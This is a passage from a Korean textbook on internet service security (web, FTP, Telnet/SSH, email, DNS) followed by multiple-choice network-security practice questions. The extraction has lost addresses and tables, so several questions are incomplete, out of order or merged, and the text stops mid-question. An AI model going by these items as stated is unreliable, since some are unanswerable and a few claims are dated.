123 제 5절. 인터넷 서비스보안 chapter 1. WEB 보안 가. WEB 개념 WEB은 인터넷과 동일한 용어로 사용될 만큼, 인터넷 사용 시 가장 많이 사용하는 프로그램이다. 네트 워크 통신 기술과 인터넷 기술의 발달로 인해 검색부터 인터넷 뱅킹 등의 전자상거래까지 대부분의 조 직 업무 및 개인 활동이Web을 통해 이루어지고 있으며, 기업뿐만 아니라 일반 사용자들도 개개인의 홈페이지를 구축하는 등 인터넷은 일반화 되었다. WEB은 클라이언트와 서버 구조로 동작하며, 우리가 인터넷 접속 시 실행하는 웹 브라우저가 클라이언 트이며 접속 요청한 웹 서버가 서버 역할을 한다. 즉, 웹 브라우저에서 웹 서버에게 URL(Uniform Resource Locator) 형식으로 웹 서버 자료 위치를 가리켜 요청한다. URL 형식은 다음과 같다. o 프로토콜://서버주소[:포트번호]/파일경로 o 예) o 이란 o http 프로토콜을 사용하여 의 index.html 자료를 요청하는 것이다. 대중적으로 많이 사용되는 웹 브라우저는 Microsoft Internet Explorer와 Netscape 등이 있으며 웹 서버는 Apache 웹 서버, Microsoft IIS 등이 있다. 나. WEB 보안 취약점 인터넷의 대중화로 인한 순 기능과 함께 Web은 보안상 많은 취약점을 내포하고 있다. 예를 들어 외부 고객 및 사용자에게 서비스 되어야 하므로 침입차단시스템에서 필터링이 이루어지지 않음으로써, 외부 공격자로부터 1차 공격 대상이 될 수 있으며, 웹 서버 구현 시 잘못된 설정 등으로 인해 여러 보안 취 약점을 가질 수 있다 (표 5-40 참고). 123
124 다. WEB 보안 대책 o 웹 서버 구현 시 소유자 및 파일 권한을 고려한다. o 웹 서버의 자식 프로세스는 루트 권한으로 실행하지 않도록 설정한다. o chroot를 사용하여 웹 서버를 설치한다. o 신속히 취약점이 제거된 최신의 패치를 설치한다. o 웹 서버를 외부망과 내부망의 중간인 DMZ 구간에 구축함으로써 내부망을 보호한다. o 웹 전용 서버를 구축하고 불필요한 계정 및 홈디렉터리, 불필요한 서비스를 제거한다. o 웹 서버 접속 시 강화된 사용자 인증 방식을 사용한다. o 웹 서버 로그를 강화하고 필요할 경우 별도의 로그 서버를 구축한다. o 해킹이나 재난/재해를 대비하여 강화된 백업을 수행한다. o 스니핑 공격을 대비하여 암호화 기능을 사용한다. 라. 보안 기술 (1) SSL(Secure Socket Layer) SSL(Secure Socket Layer)은 테리사(Terrisa)가 개발해 Netscape사가 Netscape과 NetSite의 암호화 중심 프로토콜로 사용하는 프로토콜이다.. SSL은 서버와 클라이언트 간에 인증(Certification)으로 RSA 방식과 X.509를 사용하고 실제 암호화된 정보는 새로운 암호화 소켓채널을 통해 전송하는 방식이다. SSL은 특 히 네트워크 레이어의 암호화 방식이기 때문에 HTTP뿐만 아니라 NNTP, FTP 등에도 사용할 수 있는 장점이 있다. o 인증(Authentication) 알고리즘- keyed MAC, hash(sha, MD5) o 암호화 알고리즘- DES, RC4 등 o SSL 프로토콜의 기능 - 프로토콜 버전 등 확인 - 사용할 암호화기법과 수준을 결정 - 서로를 확인(Authentication)함(클라이언트 인증은 옵션) - 암호화 기법과 키들을 주고받으며 서로 negotiation - Session 키를 생성하고 새로운 채널(포트 443번)을 통한 암호화 통신 (2) S-HTTP S-HTTP는 EIT(Enterprise Integration Technologies)에서 제안한 HTTP의 Security 확장판이다. S-HTTP 프로토콜은 HTTP 세션으로 주고받는 자료에 대한 암호화, 전자서명 등을 지원하는 메커니즘이 다.S-HTTP는 HTTP를 캡슐화하면서도 HTTP와 같은 message base 프로토콜이다. 또한 HTTP와 동일한 요청(request)과 응답(response) 구조를 이용하고 있다. 가. FTP 개념 chapter 2. FTP 보안 FTP(File Transfer Protocol)는 인터넷에 연결된 시스템 간에 파일을 송 수신하는 기능을 제공하는 것으 로, 사용자는 FTP 클라이언트 프로그램을 이용하여 FTP 서버에 접속한 후 파일 송 수신한다. FTP는 서버와 클라이언트로 구성되며, 클라이언트와 서버는 다음 두 개의 모듈로 구성된다. o PI(Protocol Interpreter) : 요청 - 응답 형식으로 명령 교환 o DTP(Data Transfer Protocol) : 데이터 전송 FTP 는 명령 채널과 데이터 전송 채널이 독립적으로 동작한다. 즉 클라이언트가 명령 채널을 통해 서 버에게 파일 전송을 요구하면 서버는 데이터 전송 채널을 통해 데이터를 전송하는 방식으로 동작하며, 이러한 방식을 통해 유연하고 강력한 파일 전송 기능을 제공한다. 참고로 서버의 명령 채널은 21번 포 트를 사용하고 데이터 전송 채널은 20번 포트를 사용한다. 124
125 익명 FTP(Anonymous FTP)누구나 FTP 서버에 접속 후 파일을 전송할 수 있도록 한 것 으로 사용자 계정 : anonymous이고 password는 사용자의 address이다. 나. FTP 보안 취약점 FTP 는 사용자 인증 정보에 대한 암호화가 이루어지지 않는다는 취약점과 FTP 프로토콜의 자체의 특 성 이용한 취약점이 존재한다. 즉, FTP 는 계정 로그인의 인증 취약점을 악용한 Brute force 공격이나 Sniffing 등에 의한 계정 권한 취득이 가능하며 익명(Anonymous) FTP의 취약점과 인가된 FTP의 취약 점, FTP 프로토콜 자체 특성을 이용한 바운스 공격에 대한 취약점 등이 존재한다(표 5-41 참고). 다. FTP 보안 대책 o 반드시 사용이 필요하지 않은 경우 FTP 서비스 사용을 금지한다. o 반드시 사용이 필요하지 않은 경우 익명(Anonymous) FTP 사용을 금지한다. o 벤더의 보안권고문을 참조하여 취약점이 제거된 최신의 FTP 버전을 유지한다. o 익명접속을 필요로 하는 경우, 최소한 익명의 업로드(쓰기 기능)는 절대로 허용하지 않는 다. o ftpd에 연결을 허용하지 않을 유저들이 기술되는 /etc/ftpusers 파일에는 최소한 다음과 같은 계 정이 등록되어야 한다.root, nobody, news, daemon, uucp, bin, sys, admin, lp 등 또한 벤더에서 제공되거나 어플리케이션 설치 시 생성되는 기본 계정을 포함시켜야 한다. 125
126 chapter 3. Telnet 보안 가. Telnet 개념 Telnet이란 컴퓨터에서 네트워크에 연결되어 있는 원거리의 서버로 접속하여 작업을 수행할 수 있게 하는 서비스로써 가상터미널 서비스라고도 한다. Telnet을 사용함으로써 기존에 실제 서버에 집적 콘솔 을 연결하여 수행했던 작업이 원격으로 관리 가능함으로써, 지리적인 거리 제한이 극복되었으며, 업무 의 효율성이 높아졌다. 다음은 Telnet 이 제공하는 기본 메커니즘이다. o 원격시스템과의 표준 인터페이스를 제공하는 가상 터미널 정의 o 클라이언트와 서버가 협상할 수 있도록 하는 메커니즘 o 대칭적으로 간주되는 양단의 연결을 허락하는 메커니즘 나. Telnet 보안 취약점 다음 [표 5-42]는 telnet 보안 취약점에 대한 설명이다. 다. Telnet 보안 대책 다음 [표 5-43]는 telnet 보안 취약점 별 보안 대책에 대한 설명이다. 126
127 라. 보안 기술 (1) SSH(Secure Shell) SSH(Secure Shell)은 로그인과 패스워드의 보안과 명령어의 실행, 그리고 파일 전송 등을 위해 사용되 는 보안 서비스이다. 대부분의 유닉스 시스템은 SSH을 사용하기 위하여 오픈소스인 OpenSSH ( 사용하거나 SSH Communication Security사의 상용 버전을 사용한다. 비록 SSH이 Telnet, FTP, R-command의 취약점을 보완하지만, SSH 자체에도 Buffer overflow 등의 취약점이 존재한다. o SSH(Secure Shell) 취약점 대응 방안 - 보안권고문을 참조하여 취약점이 제거된 최신의 SSH 버전을 유지한다. - SSH v1은 다수의 취약점이 존재하기 때문에 SSH v2의 사용을 권고한다. - SSH의 실행은 어떤 장치와 연결할 것인지, 어떤 사용자에게 인증을 허가할 것인지, 그리 고 어떤 보안 메커니즘을 적용할 것인지 등에 대한 설정 옵션을 포함한다. 관리자는 이러한 옵션들을 최적화하여 사용하여야 한다. 가. 개념 chapter 4. 보안 이란 인터넷을 이용하는 사용자간에 우편을 교환하게 해 주는 서비스를 말한다. 인터넷 기술의 발달과 네트워크 기술의 발달로 인해, 정보교환의 주요 수단으로써 이 사용되고 있으며, 현재 이 없는 생활은 상상할 수 없다. (1) SMTP(Simple Mail Transfer Protocol) 프로토콜 SMTP는 인터넷에서 전자 메일을 전달하기 위한 기본적인 프로토콜로 두 컴퓨터 간에 전달되어야 할 제어 메시지의 시퀀스를 기술하며 연결 여부 확인, 메시지 전송자 확인, 수신자들과 협상, 메시지 전달 기능을 담당한다. SMTP 프로토콜은 다음과 같은 구조로 메일을 발송한다. o UA(User Agent) : 일반적으로 메일을 주고 받게 하는 프로그램(예, Eudora) o MTA : Mail Transfer Agent 127
128 (2) POP(Post Office Protocol) 프로토콜 단독 사용자 호스트에서도 서버로부터 전자우편을 읽을 수 있도록 고안된 통신 프로토콜로 Eudora, Netscape mail, Internet Explore mail등을 이용한다. 나. 보안 취약점 다음 [표 5-44] 의 대표적인 보안 취약성에 대한 설명이다. 128
129 (1) 을 이용한 문제점 (가) 스팸 메일 스팸 메일이란 불특정 다수에게 필요 없는 대량의 메일을 보내는 것을 말하며 대부분의 상업 광고 메 일이 여기에 해당된다. 스팸 메일은 의 편리함을 악용한 대표적인 해악으로써 광고 및 메일 다운 로드 비용이 수신자에게 전가되는 것과 함께 엄청난 폭주로 인해 ISP의 정상적인 서비스를 방해한다. 스팸 메일의 발송 방식은 크게 자신이 보유하고 있는 메일 서버를 통해 직접 보내는 방식(Incoming SPAM)과 중계 메일 서버를 통해 간접적으로 보내는 방식(Relay SPAM)으로 분류된다. Incoming SPAM 은 메일 필터링 등을 통해 차단이 가능하나, Relay SPAM의 경우 차단하기 어려우며 종종 중계 메일 서버는 부당하게 필터링될 수 있어 Incoming SPAM 보다 위험하다. o 스팸 메일 보안 대책 - 이메일 서버 레벨 차단법 : 최신버전으로 패치하거나 Relay 차단 기능 활성화 등 - 이메일 클라이언트 레벨 차단법 : 이메일 클라이언트에서 특정 단어(광고, 성인 등)가 포함된 필터링 규칙을 적용 - 네트워크 구조 레벨 차단법 : 패킷 필터링, DNS(네임서버) 변경 등 - 사회공학적 차단법 : ISP 메일 담당자 간 스패머에 대한 정보 공유 및 차단 기술 공유 등의 협의체 발족 등 (나) 악성 프로그램 메일은 네트워크 공유 및 인터넷 등과 함께, 악성프로그램 (바이러스, 웜 등)의 주 전파 매체로 사용되고 있다. 특히, 메일을 통해 전파되는 악성 프로그램의 경우 다음과 같이 좀 더 복잡화되고 다양화되고 있다. o 메일을 통해 전파되는 악성 프로그램의 변화 - 제목, 첨부 파일, 본문 내용의 다양화 - 정상 메시지로 위장(제목, 메시지의 다양화) - 첨부 파일, 감염 파일 확장자 변화를 통한 위장 o 악성 프로그램에 대한 보안 대책 - 일반 사용자 바이러스 백신 프로그램 사용 및 최신 업데이트 유지 윈도우 Scripting Host 기능을 사용하지 않음 : 스크립트 바이러스(vbs), 기타 malware의 자동 실행 방지 탐색기 알려진 파일 형식 확장자 숨김 기능 미사용 : vbs 등의 확장자를 가진 악성 프로그램 탐지 인터넷 익스플로어 보안 설정을 보통 이상 으로 설정 첨부 파일을 실행하기 전, 반드시 사용자 확인 MS Office 매크로 바이러스 경고 기능 사용 Word, Excel Global Template 변경 시 사용자 확인 후 저장 Microsoft 사의 최신 보안 패치 적용 - 메일 서버 관리자 메일 서버 전용 바이러스 백신 프로그램 사용 및 최신 업데이트 유지 바이러스 방지에 대한 정보 숙지 129
130 다. 보안 기술 (1) PGP(Pretty Good Privacy) PGP는 MIME(Multipurpose Internet Mail Extension, RFC 1521) 객체에 암호화와 전자서명 기능을 추 가한 암호화 프로토콜로서, 네트워크를 통해 주고받은 메시지에 대해 송 수신자에게 보안 서비스를 제 공한다. 이는 전자우편에 국한된 보안을 제공하는 것이 아니라, MIME 객체를 전송할 수 있는 프로토 콜에서 보안 서비스를 이용할 수 있다. PGP는 메시지 암호화, 서명, 압축, 분할, 전자 우편 호환성의 5가지 기능을 제공한다. Radix 64 변환을 이용해 ACSII 부호를 암호화하여 전자우편 호환성을 보장한다. PGP는 전자우편 전송메시지의 무결성을 보증하기 위한 메시지 인증과 메시지의 생성, 처리, 전송, 저 장, 수신 등 사용자 보증을 위한 사용자 인증의 디지털 서명에는 RSA가 사용된다. 또 해쉬 함수(hash function)에는 MD5(Message Digest 5)가, 키 관리에는 RSA가 사용된다. PGP(Pretty Good Privacy) 안전한 메일 송수신을 위하여 RSA 공개키 암호 알고리즘을 사용하며, 메일 을 주고받을 때 메일을 암호화하여 전송하고, 암호화된 메일을 수신하여 해석하는 도구 역할을 하는 메일(MIME)과 관련된 도구이다. (2) S/MIME S/MIME는 1995년 RSA사가 발표한 Secure MIME이라는 MIME 보안 표준안으로서, 이는 공개키 암호 기술 사용을 위한 자체 표준인 PKCS에 기반한 것이다. RSA사가 타사의 개발을 지원하는 정책을 취함 으로써, 많은 업체에서 독자적으로 S/MIME 제품을 발표해 오고 있으며 암호화와 디지털 서명 이외에 도 다른 많은 보안서비스를 추가하면서 전자우편 보안표준을 선도해 가고 있다. S/MIME(Secure Multi-Purpose Internet Mail Extensions)은 MIME 데이터를 암호화를 통해안전하게 송 수신하는 방법을 제공한다. 인터넷의 MIME 표준에 의거하여 S/MIME은 전자 메시지 인증, 메시지 무 결성, 송신처의 부인방지(전자서명 이용), 프라이버시와 데이터 보안(암호 이용)과 같은 보안 서비스를 제공한다. S/MIME은 기존의 우편 서비스의 사용자 에이전트(MUA, Mail User Agent)에 송신하는 메시지에 암호 서비스를 부가시키고 수신 받은 메시지의 암호 서비스를 해석하는 데 이용된다.그리고 S/MIME은 전자 우편에만 한정되어 있지는 않다. HTTP와 같은 MIME 데이터를 전달하는 전송 메커니즘에도 사용된다. 따라서 S/MIME은 MIME의 객체 기반적인 특징을 이용하며 여러 가지 전송 시스템내의 메시지의 교환 을 제공한다. 더욱이 S/MIME은 소프트웨어적으로 생성한 문서의 서명과 인터넷상에서 전송된 팩시밀리 메시지의 암호화와 같이 사람이 불필요한 암호학적 보안 서비스를 사용하는 자동화된 메시지 전달 에이전트에 사용될 수 있다. 가. DNS 개념 chapter 5. DNS 보안 DNS(Domain Name System)는 TCP/IP를 기반으로 하는 인터넷에서 가장 일반적으로 사용하고 있는 도메인네임 체계이다. 이러한 체계는 도메인네임 정보를 관리하는 수많은 네임서버(DNS 서버)들의 상 호작용에 의해 유지되고 있다. 이러한 네임서버는 현존하는 가장 체계화된 분산시스템으로서. (dot)를 의미하는 13개의 최상위 네임 서버 (이하 루트서버)를 기점으로 전 세계에 분산되어 있어 사용자가 인터넷상의 어느 곳에 있든지 빠 르고 쉽게 도메인네임을 사용할 수 있다. 130
131 나. DNS 서버 동작 원리와 관리 체계 사용자와 네임서버 또는 네임서버와 네임서버 간에는 사용자가 요청한 도메인네임에 대한 IP 주소 정 보(혹은 반대의 경우도 가능)를 찾기 위한 질의와 응답 과정이 반복되면서 최종적인 결과값을 찾아가 게 된다. 이는 특정한 네임서버가 모든 정보를 가지지 않는 네임서버의 분산시스템적인 특징 때문인데 각 네임 서버들이 자신이 담당한 특정영역에 대해서만 정보를 가지고 있어 상호간의 반복적인 질의가 필수적이 다. 즉 상대적으로 상위에 있는 네임서버는 하위의 네임서버가 어떤 정보를 가졌는지 항상 알고 있을 필요 가 없다. 필요할 때마다 질의를 통해 최신의 정보를 가져오면 되고 가져온 정보는 반복질의에 의한 네 트워크 시스템의 자원낭비를 줄이기 위해 '캐싱(caching)'이라는 과정을 통해 일정시간 동안 메모리에 저장하기도 한다. 다. DNS 보안 설정 다음 [표 5-45]는 DNS 보안 설정에 대한 설명이다. 131
132 제 2장 네트워크 보안 연습 문제 132
133 1. 서버에서 tcpdump를 이용하여 패킷을 모니터링 한 결과, 아래와 같은 내용을 볼 수 있었다 설명으로 틀린 것은? 23:41: dos.com.40531> :udp 28 (frag 23:41: dos.com > (frag 1 IP Fragmentation을 이용한 공격인 Teardrop 공격 의 가능성이 크다. 2 첫 번째 패킷 조각의 사이즈가 36이고 offset이 24 이므로 일부 운영체제는 다른 프로그램의 메모리 영역까지 덮어 쓸 가능성도 있다. 3 윈도우 계열에서는 위험성이 없다. 4 커널 버전 2.0.x와 2.2.x대의 리눅스에서 취약하므로 커널을 업데이트 하는 것이 좋다. 2. IPSEC은 IETF가 IP 네트워크 레벨 상에서 암호 기법 을 이용하여 안전한 통신을 하기 위한 목적으로 만들 었으며, 인증(Authentication), 무결성(Integrity), 접근 관리, 기밀성 등을 제공해 준다. 다음은 IPSEC에 대한 설명이다. 틀린 것을 고르면? 1 네트워크 통신의 보안을 위해 사용된다. 2 AH, ESP 등의 프로토콜을 사용한다. 3 IPSEC는 VPN(Virtual Private Network)을 구현하기 위해 사용된다. 4 IPSEC의 보급이 확산되면 안전한 데이터 전송로를 확보할 수는 있으나 회선 비용의 부담은 늘어난다. 6. 다음 중 네트워크 보안을 위한 직접적인 방지책이 아닌 것은? 1 디렉터리에 sticky bit 사용 2 tcp wrapper 사용 3 ipchain 사용 4 포트 및 서비스 제한 7. 4바이트로 구성된 IP 주소를 6바이트짜리 MAC 주 소로 바꿔주는 프로토콜은 무엇인가? 1 ARP 2 IP 3 STMP 4 SNMP 8. Peer to Peer 통신에 해당되는 것을 고르면? 1 각 레이어에 대한 아래 단계 레이어에 대한 통신 2 각 레이어에 대한 윗 단계 레이어에 대한 통신 3 각 레이어에 대한 적절한 다른 단계 레이어에 대한 통신 4 각 레이어에 대한 조합된 다른 단계 레이어에 대한 통신 9. 다음 중 어느 한 연결이 단절되어도 다른 컴퓨터에 는 별다른 영향을 미치지 않는 네트워크 토폴로지 (Topology)는 무엇인가? 1 스타(Star) 2 트리(Tree) 3 링(Ring) 4 버스(Bus) 3. IPv6에 적용되어 향후 IPv6이 사용되어도 호환성을 유지할 수 있는 장점이 있는 보안 프로토콜은? 1 S/MIME 2 OSI 3 IPSEC 4 SSL 4. MAC 주소를 사용해서 침입자를 추적할 수 있는 네 트워크 환경은? 10. 무선랜(Wireless LAN)은 ISO/OSI 참조 모델의 어느 계층에서 동작하는가? 1 물리계층 및 데이터링크계층 2 데이터링크계층 및 네트워크계층 3 전송계층 및 프리젠테이션계층 4 응용계층 및 세션계층 1 LAN 3 Internet 2 WAN 4 MAN 5. IPSEC에서 제공되는 보안 서비스가 아닌 것은? 1 접근 통제 2 내부 네트워크 접근 제어 3 데이터 근원 인증 4 재전송 공격 방지 133
134 11. 네트워크 장비를 실시간으로 관리하기 위하여 SNMP 프로토콜을 사용한다. 이것으로 발생할 수 있는 취약점을 제거하기 위한 방법 중 가장 적절치 않은 것 은? 1 SNMP 커뮤니티(Community) 이름을 영어 대소문 자, 특수기호, 숫자 등을 조합하여 복잡하게 설정한 다. 2 SNMP 프로토콜을 무조건 비활성시킨다. 3 SNMP 프로토콜을 이용하여 접근할 수 있는 IP에 대하여 접근 제어를 한다. 4 SNMP 커뮤니티(Community)의 권한이 RW(Read-Write)일 경우 적절한 접근 제어 방안이 존재하는지 확인한다. 12. 패리티 체크(Parity Check)에 대한 설명 중 틀린 것은? 1 비트 단위의 에러를 테스트한다. 2 2비트의 에러는 검출할 수 없다. 3 데이터의 정확성 검증을 위해 원 데이터에 추가되 는 값은 체크 디지트이다. 4 블록 단위의 문자 에러를 발견한다. 13. IP, IPX, Netbeui 트래픽을 암호화하여 IP 헤더를 캡슐화한 후 전송하는 프로토콜을 고르면? 1 PPTP 2 IPv6 3 L2TP 4 PPP 14. 네트워크 설계 시 구성 원리로 적절치 못한 것은? 1 비인가 외부자 접근 제어 설정을 위한 네트워크 공 유 2 내부 인가자에 대한 최소 권한 설정 3 비인가 외부 접근에 대한 기본값은 모두 접근 거부 로 설정 4 DMZ 구간을 설정하여 외부 비인가자에 대한 접근 제어 설정 15. 주소변환(NAT: Network Address Translation)은 한 개의 공인 IP를 가지고 여러 개의 컴퓨터가 공유할 경 우에 그 공유하는 컴퓨터들의 IP를 공인 IP로 변화시 켜 주는 기능을 한다. 따라서 사설 네트워크를 구성하 면 외부 네트워크와 내부 네트워크를 단절시켜 보안상 안전한 구성을 설정할 수 있다. 주소변환 기능 설명으 로 옳지 않은 것 은? 1 실제 목적지 IP를 숨김으로써 외부 비인가자의 접 근을 제한한다. 2 내부 네트워크단의 브로드캐스트를 제한할 수 있는 방법이다. 3 IP 부족 현상을 해결할 수 있다. 4 외부 비인가자의 의심스러운 트래픽을 제한할 수 있는 방법이다. 16. 각 클래스별 사설 IP에 대한 설명이다. 다음 중 옳 지 않은 것은? 1 10.x.x.x for Class A x.x x.x for Class B x.x for Class C for Class D 17. 서버 A( /24)에서 서버 B( /24) 로 패킷을 보내려고 한다. 두 서버가 서로 다른 네트 워크 상에 속하기 때문에 라우터 R( , )을 거치게 되는데, 이 때 아래와 같이 순서 대로 전달되는 패킷의 내용 중 틀린 것은? [서버 A] --패킷(1)--> [라우터 R] --패킷(2)-->[서버 B] 1 패킷(1)의 src IP : , src MAC : 서버 A의 MAC 2 패킷(1)의 dest IP : , dest MAC : 서버B의 MAC 3 패킷(2)의 src IP : , src MAC : R의 MAC 4 패킷(2)의 dest IP : , dest MAC : 서버B의 MAC 134
135 18. TCP는 주고받는 패킷의 순서를 보장하기 위하여 32 비트 크기의 순서번호(Sequence Number)를, 패킷 의 상태를 나타내기 위해서 플래그를 사용한다. 다음 은 TCP의 3-way handshake가 이루어지는 과정에서 오가는 패킷의 플래그와 순서번호를 나열한 것이다. 알맞게 순서로 배열한 것을 고르면? (가) SYN (나) SYN 3500, ACK (다) ACK (가) -> (나) -> (다) 2 (다) -> (나) -> (가) 3 (나) -> (가) -> (다) 4 (가) -> (다) -> (나) 21. TCP 플래그들을 이용하여 많은 공격들이 이루어짐 으로써 침입차단시스템(Firewall)이나 침입탐지시스템 (IDS)에 의한 패킷탐지를 어렵도록 한다. 또한 각각의 플래그는 TCP 헤더에 비트 단위로 설정되는데 TCP 플 래그에 대한 설명으로 옳지 않은 것은? 1 SYN, SYN ACK, ACK 플래그는 정상적인 TCP연결 에 사용된다. 2 초기 SYN 패킷을 제외하면, 연결을 맺은 대부분의 패킷들은 ACK 비트가 설정되어야만 한다. 3 FIN ACK, ACK는 연결을 정상적으로 종료할 때 사 용된다. 4 RST 플래그만으로 연결에 대한 종료를 즉시 할 수 있다. 19. IP 헤더 필드 중 DF(Don't Fragment) 플래그가 설 정되어 있으면 IP 데이터그램을 크기가 작은 여러 조 각으로 단편화(fragmentation)하지 말라는 의미이다. 이 플래그는 네트워크 간 전송할 수 있는 데이터 크기 의 차이 때문에 필요하지만, 보안 상 여러 가지 문제 를 야기할 수 있다. 다음 설명은 DF가 설정된 데이터 그램에 대한 내용으로, 이 중 틀린 것을 고르면? 1 전송되는 데이터그램 사이즈가 해당 네트워크의 MTU보다 큰 경우 라우터에서 폐기한다. 2 다수의 데이터그램 조각 중 하나가 목적지 호스트 에 도착하지 않으면 해당 조각만 다시 재송신한다. 3 MTU보다 크기가 작은 데이터그램은 단편화되지 않는다. 4 데이터그램 조각이 전송 중 폐기된 경우, 송신 호 스트는 ICMP 에러 메시지를 받는다. 20. 서버의 이전으로 인하여 이 전에 사용하고 있는 IP 주소를 새로운 IP 주소로 변경하고자 한다. 이 때 관리자가 반드시 알아야 할 정보가 아닌 것은? 1 서브넷 마스크 2 게이트웨이 주소 3 DNS 서버 주소 4 메일서버 주소 22. 스위칭 환경의 네트워크 구성 시 보안에 관한 설 명으로 옳지 않은 것은? 1 스위치를 이용하여 업무 성격에 따라 혹은 처리하 는 데이터에 따라 세그먼트를 구분하여 네트워크 를 구성할 수 있다. 2 스위치는 트래픽을 전달할 때 모든 세그먼트로 브 로드캐스트 하지 않고 해당 세그먼트에만 전달하 므로 일반 허브를 사용하는 것보다 안전하다. 3 스위칭 환경의 네트워크 구성일지라도 같은 세그먼 트 내에서는 스니핑이 가능하다. 4 스위치의 각 포트에 대해서 MAC 주소를 dynamic 하게 대응시키게 되면 속도도 빨라지고 ARP spoofing, ARP redirect 등의 공격을 막을 수 있다. 23. 다음과 같은 특징을 가진 주소는 OSI 7 계층 중 어디에 해당하는가? A Gateway {인터넷} Gateway B A( ) A의 Gateway( ) B( ) B의 Gateway( ) - 6 바이트로 구성 - 앞의 3바이트는 벤더 코드, 뒤의 3바이트는 벤더가 할당한 코드 - 표기 예) 00:20:AF:21:3C:80 1 전송 계층 3 데이터링크 계층 2 네트워크 계층 4 물리 계층 135
136 24. 서버 A의 환경에서 NAT(Network Address Translation)를 사용할 때, 서버 B에서 보는 서버 A의 IP 주소는 무엇인가? IPSEC(Internet Protocol Security)과 관련이 가장 먼 것은? 1 키 관리 (Key Management) 2 보안 연계 (SA : Security Association) 3 보안 프로토콜 (SP : Security Protocol) 4 키 분배 센터 (KDC : Key Distribution Center) 25. 네트워크 관리자가 내부 네트워크에 추가 장비를 연결하려고 한다. 사설 IP를 사용 하려고 할 때 적당하 지 않은 것을 고르시오 네트워크 주소변환(NAT)은 사설 네트워크 주소 체 계를 가지고 있는 네트워크에서, 인터넷과 같은 Global Network에 접속하기 위해 사설주소를 공인주소로 변 환시켜주는 기능을 말하는데 이에 대한 설명으로 옳지 않은 것은? 1 RFC 1918(Address Allocation for Private Internet) 에서 할당해 놓은 A class의 사설 주소 영역은 부터 이다. 2 제한된 공인주소로 인터넷을 사용하거나 공인주소 의 부족을 해결하기 위해 DHCP를 사용하거나, 네 트워크 주소변환(NAT)을 사용하게 된다. 3 ISP 변경 시 사설 네트워크 주소를 사용하는 경우 에도 공인주소를 사용하는 경우와 마찬가지로 모 든 네트워크 주소를 변경해야 한다. 4 내부 네트워크 설계가 편하고 효율적이며 내부 네 트워크로 직접 접속할 수 없으므로 보안성에 있어 서 좋다. 27. 네트워크 주소변환은 IP 레이어에서 동작하기 때 문에, 응용 프로그램 자체에서 네트워크 주소를 포함 하여 전송하는 경우는 처리가 어렵게 된다. 이러한 경 우 어플리케이션 게이트웨이를 사용하여 네트워크 서 비스를 중계하도록 한다. 보기 중 응용 프로그램 자체 에서 네트워크 주소를 포함하여 전송하는 서비스가 아 닌 것은? 1 FTP 2 NetBIOS over TCP/IP 3 RealAudio 4 SMTP 29. 내부 네트워크로의 접근 제한을 위하여 다이얼백 (Dial-back)방식을 사용할 경우 이를 우회할 수 있는 위협은 다음 중 어느 것인가? 1 피기백킹(Piggybacking) 2 도청(Wire Trapping) 3 자동착신변경(Automatic Call Forwarding) 4 프리킹(Phreaking) 30. IPSEC은 인터넷 표준화 그룹인 IETF에서 규정한 프로토콜로서 IPv4 및 IPv6에 대해 네트워크 계층에서 보안을 제공한다. 다음 IPSEC에 대한 설명이 잘못된 것은? 1 접근제어, 데이터인증, 응답보호, 데이터무결성, 데 이터암호화 및 키 관리 기능을 제공한다. 2 IP 패킷의 인증과 암호화를 위해 2개의 헤더(AH, ESP)를 정의하고 있다. 3 AH-패킷인증, ESP-패킷 암호화 기능을 가지고 있 다. 4 원격접속 및 LAN-to-LAN 서비스와 Single Tunneling을 지원한다. 31. 다음 Windows IPSEC에 대한 설명 중 올바르지 못 한 것은? 1 TCP/IP 스택의 SSL이나 TLS와 같은 어플리케이션 계층보다 더 낮은 수준에서 암호화와 인증을 구현 한다. 2 MMC에서 IP 보안 정책 관리 스냅인을 추가함으로 써 사용 가능하다. 3 네트워크를 통해 전송되는 데이터를 암호화하지 못 한다. 4 여러 가지 종류의 필터를 제공하여 다양한 방식의 보안이 가능하다. 136
137 32. 다음 중 Windows의 IPSEC 모니터에 대해 올바르 지 않은 설명은? 1 네트워크와 관련하여 생기는 시스템 로그를 확인할 수 있다. 2 시작 - 실행 창에서 ipsecmon<모니터할 컴퓨터> 를 실행하면 된다. 3 통계치의 업데이트 간격은 옵션에서 변경할 수 있 다. 4 IPSEC 모니터를 통해 IP 보안이 성공적인지 확인할 수 있다. 35. 터널링 프로토콜에서 L2TP(Layer 2 Tunneling Protocol)에 대한 설명이 잘못된 것은? 1 L2TP는 PPP 데이터를 위한 암호화 메커니즘을 가 지고 있다. 2 사용자 인증에 있어 사용자 ID와 도메인을 결합한 형태를 검증한다. 3 터널이 생성되면 L2TP는 통신망을 통해 전달되는 PPP 패킷을 캡슐화한다. 4 데이터 암호화를 위해 IPSEC의 AH와 ESP를 참조한 다. 33. IPv6(Internet Protocol Version 6)이 IPv4(Internet Protocol Version 4)와 구별될 수 있는 변화로 틀린 것 은? 1 확장된 어드레싱과 헤더 형식의 단순화: IP 어드레 스의 크기가 32비트에서 128비트로 증가하고 헤더 형식이 단순화되었다. 2 인증과 보안 능력: 인증, 데이터의 무결성, 데이터 의 기밀성을 제공 3 확장성과 QoS(Quality of Service)의 강화: 새로운 기능을 추가하기 쉽도록 확장성과 리얼타임과 같 은 서비스를 지원할 수 있도록 설계 4 통신 계층의 세분화: 다양한 서비스를 지원하기 위 하여 통신 계층을 세분화하였다. 34. TTL(Time To Live)은 패킷이 네트워크에서 유효한 시간을 뜻한다. 다음 TTL에 대한 설명으로 틀린 것은? 1 TTL 값은 IP 패킷을 생성할 때 헤더에 처음 만들어 지는데 최대값은 255이다. 2 네트워크에서 라우터 하나를 거칠 때마다 TTL 값은 1씩 증가한다. 3 'TTL Expire in Transit'는 패킷이 전송하는 도중에 TTL 값이 목적지에 도착하기 전에 '0'이 되어서 전 송이 중지되었다는 뜻이다. 4 TTL을 사용하는 이유는 목적지를 찾지 못하거나, 경로에 루프가 형성되어 인터넷상을 끝없이 돌아 다니는 불필요한 패킷들을 소멸하기 위한 것이다. 36. 네트워크마다 데이터링크 계층 프레임으로 송신할 수 있는 최대 데이터 크기(MTU)를 서로 다르게 제한 하고 있다. IP는 다양한 네트워크 하드웨어 종류에 대 응하도록 설계되었는데 다음 네트워크 종류와 최대 데 이터 크기(MTU)가 일치하지 않는 것은? 1 Ethernet : 1500bytes 2 IEEE802.3 : 4400bytes 3 IEEE802.4 : 8166bytes 4 FDDI : 4352bytes 37. 플래그는 패킷의 분할에 관한 정보를 나타낸다. 다 음 플래그 필드 정보가 의미하는 내용 중 올바르지 않 은 것은? 1 DF 1 : 